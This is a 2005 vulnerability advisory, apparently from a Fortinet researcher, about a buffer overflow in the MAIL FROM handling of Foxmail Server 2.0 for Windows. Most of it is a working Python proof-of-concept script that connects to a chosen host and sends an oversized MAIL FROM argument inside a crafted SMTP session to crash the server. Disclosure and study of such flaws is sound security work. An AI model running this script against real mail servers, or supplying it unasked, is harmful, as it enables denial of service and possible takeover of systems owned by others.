DATE:
02/04/2005

AUTHOR:
(Fortinet, inc)
xouyang<xouyang_at_fortinet.com> <oyxin@segfault.cn>

PRODUCTS:
    Foxmail Server- A MAil server for both Windows and linux.

AFFECTED VERSION:
    Foxmail server for windows version 2.0(Newest).I just test windows server ,maybe linux version have vulnerability too.

Description:
    Foxmail-the Email client application is the most famous software product in China. Chinese version is sold to more than 3 million users and English version to over 20 countries. It is listed as "Top Ten Domestic Software" and evaluated as "5 Star Software" by ZDNET.
    BODA s NT/Linux-based email server system is featured by stability, security, ease of installation and maintenance, rich functions. Different versions of product can meet the varied needs ranging from small/medium- sized enterprises to ISPs/ICPs/ASPs. 

DOWNLOAD:
    http://www.foxmail.com.cn/english/english_3.htm
    http://fox.foxmail.com.cn/cgi/download/nt/nph-install_nt.cgi

Detail: 
    A vulnerabilities have been identified in Foxmail server , which can be exploited by malicious people to cause a DoS (Denial of Service) or maybe compromise a vulnerable server.

    The vulnerabilities are caused due to boundary errors in the handling of the "MAIL FROM:" commands. A malicious person can exploit this by supplying a long, specially crafted argument to the vulnerable commands, which will result in a buffer overflow.

    Successful exploitation will cause a DOS or maybe  allow execution of arbitrary code with SYSTEM privileges.

FOXmail POC exploit:

#!/usr/bin/python
#Code by OYXin
#oyxin_at_segfault.cn
import socket
import sys
import getopt


def usage():
    print "Usage: foxserver.py -h host -p port"
    sys.exit(0)
    
if __name__ == '__main__':
    
    try: 
        opts, args = getopt.getopt(sys.argv[1:], "h:p:") 
    except getopt.GetoptError, msg: 
        print msg
        usage()
        
    for o,a in opts:
        if o in ["-h"]:
            host = a
        if o in ["-p"]:
            port = int(a)

    evilbuf =  "MAIL-FROM: <" + "A"*5000 + ">" + "\r\n"
    evilbuf += "RCPT-TO: postmaster@company.mailDATA" + "\r\n"
    evilbuf += "Message-ID: 123" + "\r\n"
    evilbuf += "ASDF" + "\r\n"
    evilbuf += "." + "\r\n"
    evilbuf += "QUIT" + "\r\n"
    try:
        sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sockfd.connect((host, port))
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send("HELO localhost\r\n")
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send(evilbuf)
    except socket.error, msg:
        print msg
        
    sockfd.close()


THANKS:
    Thanks felix and Ning Wang who in fortinet security research team to verify this Vulnerability